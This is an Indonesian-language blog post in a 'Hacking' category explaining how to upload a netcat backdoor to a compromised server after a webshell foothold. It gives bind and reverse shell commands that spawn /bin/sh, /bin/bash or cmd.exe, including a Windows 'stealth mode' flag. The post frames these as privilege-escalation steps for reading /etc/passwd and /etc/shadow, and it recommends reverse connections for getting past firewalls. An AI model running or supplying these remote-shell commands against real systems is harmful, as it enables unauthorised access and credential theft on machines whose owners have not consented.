jump to navigation

Cara Remote Shell with NetCat December 10, 2011

Posted by ariefsyamsudien in Hacking.
trackback

Dalam melakukan proses previlege escalation, kita tidak bisa melakukan eksekusi langsung untuk melihat file /etc/passwd dan /etc/shadow atau mengeksekusi sebuah eksploit melewati sebuah webshell (shell yang dibuat dengan pemrograman web). maka dari itu, kita perlu mengupload sebuah shell backdoor agar mendapatkan shell secara interaktif.

tool yang sering digunakan untuk melakukan remote shell antara lain ssh(linux) atau telnet(windows) atau sebuah tool dari pihak ke tiga yaitu netcat (windows & linux). untuk windows, anda dapat mendapatkannya di sini, untuk linux biasanya telah terinstall waktu menginstall OS linux.

sebenarnya netcat memiliki banyak fungsi lain sehingga disebut swiss army knife karena kegunaanya. netcat dapat menjadi server maupun client (tapi netcat tidak peduli pada server maupun client) dapat melakukan bind mauupun reverse connection.

okelah… begini caranya melakukan bind connection

client server linux server windows
nc nc -l -v -p -e /bin/sh nc -l -v -p -d -e cmd.exe

dan untuk melakukan reverse connection

client server linux server windows
nc -l -v -p nc -e /bin/bash nc -d -e cmd.exe

keterangan :

  • -d : stealth mode. khusus windows
  • -l : listen mode
  • -p : specify port untuk inbound connection
  • -v atau -vv : verbose (opsional)
  • -e : buka aplikasi setelah terkoneksi

pada awalnya saya juga bingung, bagaimana cara membedakan netcat sebagai server karena netcat tidak perduli dengan fungsi server atau client. namun saya telah menemukannya, anda harus memasukkan parameter -e agar kelanjutan setelah terkoneksi adalah membuka file tersebut sebagai shell (cmd atau sh)

karena banyak yang bertanya, akhirnya saya menjawab pertanyaan apa sih bedanya bind connection dengan reverse connection?. inilah bedanya :

bind :
merupakan metode koneksi dimana kita membuat koneksi ke komputer target melalui port yang telah dibuka oleh netcat. kelemahannya adalah masalah proteksi firewall yang mempunyai kebiasaan menutup port yang tertutup

reverse :
metode dimana kita berada pada posisi listening koneksi yang masuk, yang dibuat oleh target. kelebihannya adalahn rata-rata keberhasilan yang cukup tinggi karena tidak mendapat masalah firewall, namun kekurangannya, kita harus mendapatkan IP yang dapat diakses oleh publik agar netcat mengenali IP kita. namun lagi (:ngakak kebanyakan namun nih), fitur netcat terbaru yaitu gateway hopping dengan parameter “-g” dimana kita bisa mendapatkan gateway yang kita lalui dengan perintah “tracert ““. saya tidak yakin karena belum pernah mencoba cara ini

Thank’s to my best friend xp-ku.cc.cc

Comments»

No comments yet — be the first.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: